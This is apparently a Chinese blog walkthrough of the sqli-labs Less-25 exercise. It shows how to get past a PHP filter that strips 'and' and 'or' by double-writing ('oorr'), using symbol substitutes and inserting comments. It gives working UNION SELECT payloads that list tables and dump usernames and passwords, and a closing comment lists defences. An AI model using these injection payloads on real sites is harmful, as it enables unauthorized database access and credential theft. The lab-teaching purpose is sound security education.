SQL注入 绕过and和or过滤

SQL注入 绕过and和or过滤

1.基础知识介绍

1.MySQL中的大小写不敏感,大写与小写一样。
2.MySQL中的十六进制与URL编码
3.符号和关键字替换and – &&、or–||
4.内联注释与多行注释

/*! 内联注释*/

    
    
  • 1
/*多行注释*/

    
    
  • 1

2.去除and和or的代码分析

preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组

在这里插入图片描述

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

    
    
  • 1
  • 2

值得一说的是preg_replace函数后面的/i是指ignore,就是忽略大小写

3.绕过去除and和or的SQL注入

1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
3.利用符号替代——and --&& or–||
我们以sqli-labs-less25为例
1.当我们输入1时,回显正常,当我们输入1\时报错

在这里插入图片描述
2.可以判断出,此sql注入为字符型,判断and,or等关键字是否被过滤

?id=1' and 1=1#

    
    
  • 1

在这里插入图片描述
3.发现andor被过滤为空,这里我使用的是双写绕过

?id=1' oorr 1=1--+

    
    
  • 1

在这里插入图片描述
4.爆破数据库
在这里插入图片描述
5.爆破数据表

?id=-1'and union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3%23

    
    
  • 1

在这里插入图片描述

6.爆破字段名
在这里插入图片描述
7.爆破字段内容
获取用户名和密码

?id=-1' union select 1,(select group_concat(username,passwoorrd) from users),3--+

    
    
  • 1

在这里插入图片描述

</article>
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入中的or和and是两个常见的关键字,用于拼接SQL语句的条件。 当应用程序没有对用户输入进行充分的过滤和验证时,攻击者可以通过构造恶意的输入来绕过输入验证,修改原始SQL语句的逻辑,从而执行非授权的操作。 在SQL语句中,or用于连接多个条件,只要满足其中一个条件就成立;而and则要求同时满足多个条件才成立。 为了防止SQL注入攻击,可以采取以下措施: 1. 使用参数化查询或预编译语句来构建SQL语句,将用户输入作为参数传递,而不是直接拼接在SQL语句中。 2. 对用户输入进行严格的过滤和验证,确保只有合法的输入才能通过。 3. 对用户输入进行转义,将特殊字符转换为其对应的转义序列,以防止恶意输入破坏SQL语句的结构。 4. 限制数据库用户的权限,确保其只能执行必要的操作,避免对数据库的非授权访问。 总之,在编写应用程序时,需要充分考虑安全性,对用户输入进行正确的过滤和验证,以防止SQL注入攻击。 <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入 绕过and和or过滤](https://blog.csdn.net/m_de_g/article/details/121792949)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值